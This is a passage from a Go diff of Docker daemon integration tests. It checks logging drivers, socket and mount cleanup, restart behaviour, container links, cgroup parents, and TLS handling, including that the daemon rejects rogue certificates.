%v in future", res.Time) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "--log-driver=none", "busybox", "echo", "testline") + if err != nil { + c.Fatal(out, err) + } + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { + c.Fatalf("%s shouldn't exist, error on Stat: %s", logPath, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) { + if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { + 
c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") + if err != nil { + c.Fatal(out, err) + } + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.folder, "graph", "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { + c.Fatalf("%s shouldn't exist, error on Stat: %s", logPath, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) { + if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "--log-driver=json-file", "busybox", "echo", "testline") + if err != nil { + c.Fatal(out, err) + } + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err != nil { + c.Fatal(err) + } + f, err := os.Open(logPath) + if err != nil { + c.Fatal(err) + } + defer f.Close() + + var res struct { + Log string `json:"log"` + Stream string `json:"stream"` + Time time.Time `json:"time"` + } + if err := json.NewDecoder(f).Decode(&res); err != nil { + c.Fatal(err) + } + if res.Log != "testline\n" { + c.Fatalf("Unexpected log line: %q, expected: %q", res.Log, "testline\n") + } + if res.Stream != "stdout" { + c.Fatalf("Unexpected stream: %q, expected: %q", res.Stream, "stdout") + } + if !time.Now().After(res.Time) { + c.Fatalf("Log time %v in future", res.Time) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneLogsError(c *check.C) { + c.Assert(s.d.StartWithBusybox("--log-driver=none"), checker.IsNil) + + out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("logs", "test") + c.Assert(err, check.NotNil, check.Commentf("Logs should fail with 'none' driver")) + expected := `"logs" command is supported only for "json-file" and 
"journald" logging drivers (got: none)` + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) { + dir, err := ioutil.TempDir("", "socket-cleanup-test") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(dir) + + sockPath := filepath.Join(dir, "docker.sock") + if err := s.d.Start("--host", "unix://"+sockPath); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(sockPath); err != nil { + c.Fatal("socket does not exist") + } + + if err := s.d.Stop(); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(sockPath); err == nil || !os.IsNotExist(err) { + c.Fatal("unix socket is not cleaned up") + } +} + +func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { + type Config struct { + Crv string `json:"crv"` + D string `json:"d"` + Kid string `json:"kid"` + Kty string `json:"kty"` + X string `json:"x"` + Y string `json:"y"` + } + + os.Remove("/etc/docker/key.json") + if err := s.d.Start(); err != nil { + c.Fatalf("Failed to start daemon: %v", err) + } + + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + config := &Config{} + bytes, err := ioutil.ReadFile("/etc/docker/key.json") + if err != nil { + c.Fatalf("Error reading key.json file: %s", err) + } + + // byte[] to Data-Struct + if err := json.Unmarshal(bytes, &config); err != nil { + c.Fatalf("Error Unmarshal: %s", err) + } + + //replace config.Kid with the fake value + config.Kid = "VSAJ:FUYR:X3H2:B2VZ:KZ6U:CJD5:K7BX:ZXHY:UZXT:P4FT:MJWG:HRJ4" + + // NEW Data-Struct to byte[] + newBytes, err := json.Marshal(&config) + if err != nil { + c.Fatalf("Error Marshal: %s", err) + } + + // write back + if err := ioutil.WriteFile("/etc/docker/key.json", newBytes, 0400); err != nil { + c.Fatalf("Error ioutil.WriteFile: %s", err) + } + + defer os.Remove("/etc/docker/key.json") + + if err := s.d.Start(); err == nil { + c.Fatalf("It should not be successful to start daemon with wrong key: %v", err) + } + + 
content, _ := ioutil.ReadFile(s.d.logFile.Name()) + + if !strings.Contains(string(content), "Public Key ID does not match") { + c.Fatalf("Missing KeyID message from daemon logs: %s", string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + out, err := s.d.Cmd("run", "-id", "busybox", "/bin/cat") + if err != nil { + c.Fatalf("Could not run /bin/cat: err=%v\n%s", err, out) + } + containerID := strings.TrimSpace(out) + + if out, err := s.d.Cmd("kill", containerID); err != nil { + c.Fatalf("Could not kill %s: err=%v\n%s", containerID, err, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + errchan := make(chan error) + go func() { + if out, err := s.d.Cmd("wait", containerID); err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + close(errchan) + }() + + select { + case <-time.After(5 * time.Second): + c.Fatal("Waiting on a stopped (killed) container timed out") + case err := <-errchan: + if err != nil { + c.Fatal(err) + } + } +} + +// TestHTTPSInfo connects via two-way authenticated HTTPS to the info endpoint +func (s *DockerDaemonSuite) TestHTTPSInfo(c *check.C) { + const ( + testDaemonHTTPSAddr = "tcp://localhost:4271" + ) + + if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "info", + } + out, err := s.d.Cmd(args...) 
+ if err != nil { + c.Fatalf("Error Occurred: %s and output: %s", err, out) + } +} + +// TestHTTPSRun connects via two-way authenticated HTTPS to the create, attach, start, and wait endpoints. +// https://github.com/docker/docker/issues/19280 +func (s *DockerDaemonSuite) TestHTTPSRun(c *check.C) { + const ( + testDaemonHTTPSAddr = "tcp://localhost:4271" + ) + + if err := s.d.StartWithBusybox("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "run", "busybox", "echo", "TLS response", + } + out, err := s.d.Cmd(args...) + if err != nil { + c.Fatalf("Error Occurred: %s and output: %s", err, out) + } + + if !strings.Contains(out, "TLS response") { + c.Fatalf("expected output to include `TLS response`, got %v", out) + } +} + +// TestTLSVerify verifies that --tlsverify=false turns on tls +func (s *DockerDaemonSuite) TestTLSVerify(c *check.C) { + out, err := exec.Command(dockerdBinary, "--tlsverify=false").CombinedOutput() + if err == nil || !strings.Contains(string(out), "Could not load X509 key pair") { + c.Fatalf("Daemon should not have started due to missing certs: %v\n%s", err, string(out)) + } +} + +// TestHTTPSInfoRogueCert connects via two-way authenticated HTTPS to the info endpoint +// by using a rogue client certificate and checks that it fails with the expected error. 
+func (s *DockerDaemonSuite) TestHTTPSInfoRogueCert(c *check.C) { + const ( + errBadCertificate = "bad certificate" + testDaemonHTTPSAddr = "tcp://localhost:4271" + ) + + if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-rogue-cert.pem", + "--tlskey", "fixtures/https/client-rogue-key.pem", + "info", + } + out, err := s.d.Cmd(args...) + if err == nil || !strings.Contains(out, errBadCertificate) { + c.Fatalf("Expected err: %s, got instead: %s and output: %s", errBadCertificate, err, out) + } +} + +// TestHTTPSInfoRogueServerCert connects via two-way authenticated HTTPS to the info endpoint +// which provides a rogue server certificate and checks that it fails with the expected error +func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) { + const ( + errCaUnknown = "x509: certificate signed by unknown authority" + testDaemonRogueHTTPSAddr = "tcp://localhost:4272" + ) + if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-rogue-cert.pem", + "--tlskey", "fixtures/https/server-rogue-key.pem", "-H", testDaemonRogueHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonRogueHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-rogue-cert.pem", + "--tlskey", "fixtures/https/client-rogue-key.pem", + "info", + } + out, err := s.d.Cmd(args...) 
+ if err == nil || !strings.Contains(out, errCaUnknown) { + c.Fatalf("Expected err: %s, got instead: %s and output: %s", errCaUnknown, err, out) + } +} + +func pingContainers(c *check.C, d *Daemon, expectFailure bool) { + var dargs []string + if d != nil { + dargs = []string{"--host", d.sock()} + } + + args := append(dargs, "run", "-d", "--name", "container1", "busybox", "top") + dockerCmd(c, args...) + + args = append(dargs, "run", "--rm", "--link", "container1:alias1", "busybox", "sh", "-c") + pingCmd := "ping -c 1 %s -W 1" + args = append(args, fmt.Sprintf(pingCmd, "alias1")) + _, _, err := dockerCmdWithError(args...) + + if expectFailure { + c.Assert(err, check.NotNil) + } else { + c.Assert(err, check.IsNil) + } + + args = append(dargs, "rm", "-f", "container1") + dockerCmd(c, args...) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithSocketAsVolume(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + socket := filepath.Join(s.d.folder, "docker.sock") + + out, err := s.d.Cmd("run", "--restart=always", "-v", socket+":/sock", "busybox") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(s.d.Restart(), check.IsNil) +} + +// os.Kill should kill daemon ungracefully, leaving behind container mounts. +// A subsequent daemon restart should clean up said mounts. +func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonAndContainerKill(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + id := strings.TrimSpace(out) + c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + + // container mounts should exist even after daemon has crashed. 
+ comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + + // kill the container + runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", id) + if out, ec, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Failed to run ctr, ExitCode: %d, err: %v output: %s id: %s\n", ec, err, out, id) + } + + // restart daemon. + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + // Now, container mounts should be gone. + mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) +} + +// os.Interrupt should perform a graceful daemon shutdown and hence cleanup mounts. +func (s *DockerDaemonSuite) TestCleanupMountsAfterGracefulShutdown(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + id := strings.TrimSpace(out) + + // Send SIGINT and daemon should clean up + c.Assert(s.d.cmd.Process.Signal(os.Interrupt), check.IsNil) + // Wait for the daemon to stop. 
+ c.Assert(<-s.d.wait, checker.IsNil) + + mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) +} + +func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + c.Assert(s.d.StartWithBusybox("-b", "none"), check.IsNil) + + out, err := s.d.Cmd("run", "--rm", "busybox", "ip", "l") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.Contains(out, "eth0"), check.Equals, false, + check.Commentf("There shouldn't be eth0 in container in default(bridge) mode when bridge network is disabled: %s", out)) + + out, err = s.d.Cmd("run", "--rm", "--net=bridge", "busybox", "ip", "l") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.Contains(out, "eth0"), check.Equals, false, + check.Commentf("There shouldn't be eth0 in container in bridge mode when bridge network is disabled: %s", out)) + // the extra grep and awk clean up the output of `ip` to only list the number and name of + // interfaces, allowing for different versions of ip (e.g. 
inside and outside the container) to + // be used while still verifying that the interface list is the exact same + cmd := exec.Command("sh", "-c", "ip l | grep -E '^[0-9]+:' | awk -F: ' { print $1\":\"$2 } '") + stdout := bytes.NewBuffer(nil) + cmd.Stdout = stdout + if err := cmd.Run(); err != nil { + c.Fatal("Failed to get host network interface") + } + out, err = s.d.Cmd("run", "--rm", "--net=host", "busybox", "sh", "-c", "ip l | grep -E '^[0-9]+:' | awk -F: ' { print $1\":\"$2 } '") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(out, check.Equals, fmt.Sprintf("%s", stdout), + check.Commentf("The network interfaces in container should be the same with host when --net=host when bridge network is disabled: %s", out)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + t.Fatal(err) + } + if out, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top"); err != nil { + t.Fatal(out, err) + } + + if err := s.d.Restart(); err != nil { + t.Fatal(err) + } + // Container 'test' should be removed without error + if out, err := s.d.Cmd("rm", "test"); err != nil { + t.Fatal(out, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + out, err := s.d.Cmd("run", "--name", "netns", "-d", "busybox", "top") + if err != nil { + c.Fatal(out, err) + } + + // Get sandbox key via inspect + out, err = s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.SandboxKey}}'", "netns") + if err != nil { + c.Fatalf("Error inspecting container: %s, %v", out, err) + } + fileName := strings.Trim(out, " \r\n'") + + if out, err := s.d.Cmd("stop", "netns"); err != nil { + c.Fatal(out, err) + } + + // Test if the file still exists + out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) + out = strings.TrimSpace(out) + c.Assert(err, check.IsNil, 
check.Commentf("Output: %s", out)) + c.Assert(out, check.Equals, fileName, check.Commentf("Output: %s", out)) + + // Remove the container and restart the daemon + if out, err := s.d.Cmd("rm", "netns"); err != nil { + c.Fatal(out, err) + } + + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + // Test again and see now the netns file does not exist + out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) + out = strings.TrimSpace(out) + c.Assert(err, check.Not(check.IsNil), check.Commentf("Output: %s", out)) +} + +// tests regression detailed in #13964 where DOCKER_TLS_VERIFY env is ignored +func (s *DockerDaemonSuite) TestDaemonTLSVerifyIssue13964(c *check.C) { + host := "tcp://localhost:4271" + c.Assert(s.d.Start("-H", host), check.IsNil) + cmd := exec.Command(dockerBinary, "-H", host, "info") + cmd.Env = []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"} + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, check.Not(check.IsNil), check.Commentf("%s", out)) + c.Assert(strings.Contains(out, "error during connect"), check.Equals, true) + +} + +func setupV6(c *check.C) { + // Hack to get the right IPv6 address on docker0, which has already been created + result := icmd.RunCommand("ip", "addr", "add", "fe80::1/64", "dev", "docker0") + result.Assert(c, icmd.Expected{}) +} + +func teardownV6(c *check.C) { + result := icmd.RunCommand("ip", "addr", "del", "fe80::1/64", "dev", "docker0") + result.Assert(c, icmd.Expected{}) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlways(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top") + c.Assert(err, check.IsNil) + id := strings.TrimSpace(out) + + _, err = s.d.Cmd("stop", id) + c.Assert(err, check.IsNil) + _, err = s.d.Cmd("wait", id) + c.Assert(err, check.IsNil) + + out, err = s.d.Cmd("ps", "-q") + c.Assert(err, check.IsNil) + c.Assert(out, check.Equals, 
"") + + c.Assert(s.d.Restart(), check.IsNil) + + out, err = s.d.Cmd("ps", "-q") + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), check.Equals, id[:12]) +} + +func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) { + if err := s.d.StartWithBusybox("--log-opt=max-size=1k"); err != nil { + c.Fatal(err) + } + name := "logtest" + out, err := s.d.Cmd("run", "-d", "--log-opt=max-file=5", "--name", name, "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s, err: %v", out, err)) + + out, err = s.d.Cmd("inspect", "-f", "{{ .HostConfig.LogConfig.Config }}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(out, checker.Contains, "max-size:1k") + c.Assert(out, checker.Contains, "max-file:5") + + out, err = s.d.Cmd("inspect", "-f", "{{ .HostConfig.LogConfig.Type }}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "json-file") +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + if out, err := s.d.Cmd("run", "-i", "-d", "--name", "test", "busybox", "top"); err != nil { + c.Fatal(err, out) + } + if out, err := s.d.Cmd("pause", "test"); err != nil { + c.Fatal(err, out) + } + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + errchan := make(chan error) + go func() { + out, err := s.d.Cmd("start", "test") + if err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + name := strings.TrimSpace(out) + if name != "test" { + errchan <- fmt.Errorf("Paused container start error on docker daemon restart, expected 'test' but got '%s'", name) + } + close(errchan) + }() + + select { + case <-time.After(5 * time.Second): + c.Fatal("Waiting on start a container timed out") + case err := <-errchan: + if err != nil { + c.Fatal(err) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) { + 
c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("create", "-v", "test:/foo", "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + + c.Assert(s.d.Restart(), check.IsNil) + + out, err = s.d.Cmd("volume", "rm", "test") + c.Assert(err, check.NotNil, check.Commentf("should not be able to remove in use volume after daemon restart")) + c.Assert(out, checker.Contains, "in use") +} + +func (s *DockerDaemonSuite) TestDaemonRestartLocalVolumes(c *check.C) { + c.Assert(s.d.Start(), check.IsNil) + + _, err := s.d.Cmd("volume", "create", "test") + c.Assert(err, check.IsNil) + c.Assert(s.d.Restart(), check.IsNil) + + _, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, check.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonCorruptedLogDriverAddress(c *check.C) { + c.Assert(s.d.Start("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil) + expected := "Failed to set log opts: syslog-address should be in form proto://address" + runCmd := exec.Command("grep", expected, s.d.LogFileName()) + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonCorruptedFluentdAddress(c *check.C) { + c.Assert(s.d.Start("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil) + expected := "Failed to set log opts: invalid fluentd-address corrupted:c: " + runCmd := exec.Command("grep", expected, s.d.LogFileName()) + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonStartWithoutHost(c *check.C) { + s.d.useDefaultHost = true + defer func() { + s.d.useDefaultHost = false + }() + c.Assert(s.d.Start(), check.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) { + s.d.useDefaultTLSHost 
= true + defer func() { + s.d.useDefaultTLSHost = false + }() + if err := s.d.Start( + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem"); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + // The client with --tlsverify should also use default host localhost:2376 + tmpHost := os.Getenv("DOCKER_HOST") + defer func() { + os.Setenv("DOCKER_HOST", tmpHost) + }() + + os.Setenv("DOCKER_HOST", "") + + out, _ := dockerCmd( + c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "version", + ) + if !strings.Contains(out, "Server") { + c.Fatalf("docker version should return information of server side") + } +} + +func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + bridgeIP := "192.169.1.1" + bridgeRange := bridgeIP + "/30" + + err := s.d.StartWithBusybox("--bip", bridgeRange) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + var cont int + for { + contName := fmt.Sprintf("container%d", cont) + _, err = s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2") + if err != nil { + // pool exhausted + break + } + ip, err := s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.IPAddress}}'", contName) + c.Assert(err, check.IsNil) + + c.Assert(ip, check.Not(check.Equals), bridgeIP) + cont++ + } +} + +// Test daemon for no space left on device error +func (s *DockerDaemonSuite) TestDaemonNoSpaceLeftOnDeviceError(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux, Network) + + testDir, err := ioutil.TempDir("", "no-space-left-on-device-test") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testDir) + c.Assert(mount.MakeRShared(testDir), checker.IsNil) + defer mount.Unmount(testDir) + + // create a 2MiB image and mount 
it as graph root + // Why in a container? Because `mount` sometimes behaves weirdly and often fails outright on this test in debian:jessie (which is what the test suite runs under if run from the Makefile) + dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=2 count=0") + out, _, err := runCommandWithOutput(exec.Command("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img"))) // `mkfs.ext4` is not in busybox + c.Assert(err, checker.IsNil, check.Commentf(out)) + + cmd := exec.Command("losetup", "-f", "--show", filepath.Join(testDir, "testfs.img")) + loout, err := cmd.CombinedOutput() + c.Assert(err, checker.IsNil) + loopname := strings.TrimSpace(string(loout)) + defer exec.Command("losetup", "-d", loopname).Run() + + dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", fmt.Sprintf("mkdir -p /test/test-mount && mount -t ext4 -no loop,rw %v /test/test-mount", loopname)) + defer mount.Unmount(filepath.Join(testDir, "test-mount")) + + err = s.d.Start("--graph", filepath.Join(testDir, "test-mount")) + defer s.d.Stop() + c.Assert(err, check.IsNil) + + // pull a repository large enough to fill the mount point + pullOut, err := s.d.Cmd("pull", "registry:2") + c.Assert(err, checker.NotNil, check.Commentf(pullOut)) + c.Assert(pullOut, checker.Contains, "no space left on device") +} + +// Test daemon restart with container links + auto restart +func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + parent1Args := []string{} + parent2Args := []string{} + wg := sync.WaitGroup{} + maxChildren := 10 + chErr := make(chan error, maxChildren) + + for i := 0; i < maxChildren; i++ { + wg.Add(1) + name := fmt.Sprintf("test%d", i) + + if i < maxChildren/2 { + parent1Args = append(parent1Args, []string{"--link", name}...) 
+ } else { + parent2Args = append(parent2Args, []string{"--link", name}...) + } + + go func(name string) { + _, runErr := s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") + chErr <- runErr + wg.Done() + }(name) + } + + wg.Wait() + close(chErr) + for err := range chErr { + c.Assert(err, check.IsNil) + } + + parent1Args = append([]string{"run", "-d"}, parent1Args...) + parent1Args = append(parent1Args, []string{"--name=parent1", "--restart=always", "busybox", "top"}...) + parent2Args = append([]string{"run", "-d"}, parent2Args...) + parent2Args = append(parent2Args, []string{"--name=parent2", "--restart=always", "busybox", "top"}...) + + _, err = s.d.Cmd(parent1Args...) + c.Assert(err, check.IsNil) + _, err = s.d.Cmd(parent2Args...) + c.Assert(err, check.IsNil) + + err = s.d.Stop() + c.Assert(err, check.IsNil) + // clear the log file -- we don't need any of it but may for the next part + // can ignore the error here, this is just a cleanup + os.Truncate(s.d.LogFileName(), 0) + err = s.d.Start() + c.Assert(err, check.IsNil) + + for _, num := range []string{"1", "2"} { + out, err := s.d.Cmd("inspect", "-f", "{{ .State.Running }}", "parent"+num) + c.Assert(err, check.IsNil) + if strings.TrimSpace(out) != "true" { + log, _ := ioutil.ReadFile(s.d.LogFileName()) + c.Fatalf("parent container is not running\n%s", string(log)) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) { + testRequires(c, DaemonIsLinux) + + cgroupParent := "test" + name := "cgroup-test" + + err := s.d.StartWithBusybox("--cgroup-parent", cgroupParent) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + out, err := s.d.Cmd("run", "--name", name, "busybox", "cat", "/proc/self/cgroup") + c.Assert(err, checker.IsNil) + cgroupPaths := parseCgroupPaths(string(out)) + c.Assert(len(cgroupPaths), checker.Not(checker.Equals), 0, check.Commentf("unexpected output - %q", string(out))) + out, err = s.d.Cmd("inspect", "-f", "{{.Id}}", name) + c.Assert(err, checker.IsNil) + id := 
strings.TrimSpace(string(out)) + expectedCgroup := path.Join(cgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + c.Assert(found, checker.True, check.Commentf("Cgroup path for container (%s) doesn't found in cgroups file: %s", expectedCgroup, cgroupPaths)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support links + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "--name=test2", "--link", "test:abc", "busybox", "sh", "-c", "ping -c 1 -w 1 abc") + c.Assert(err, check.IsNil, check.Commentf(out)) + + c.Assert(s.d.Restart(), check.IsNil) + + // should fail since test is not running yet + out, err = s.d.Cmd("start", "test2") + c.Assert(err, check.NotNil, check.Commentf(out)) + + out, err = s.d.Cmd("start", "test") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("start", "-a", "test2") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(strings.Contains(out, "1 packets transmitted, 1 packets received"), check.Equals, true, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support links + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("create", "--name=test", "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "-d", "--name=test2", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + test2ID := strings.TrimSpace(out) + + out, err = s.d.Cmd("run", "-d", "--name=test3", "--link", "test2:abc", "busybox", "top") + test3ID := strings.TrimSpace(out) + + c.Assert(s.d.Restart(), check.IsNil) + + out, err = s.d.Cmd("create", 
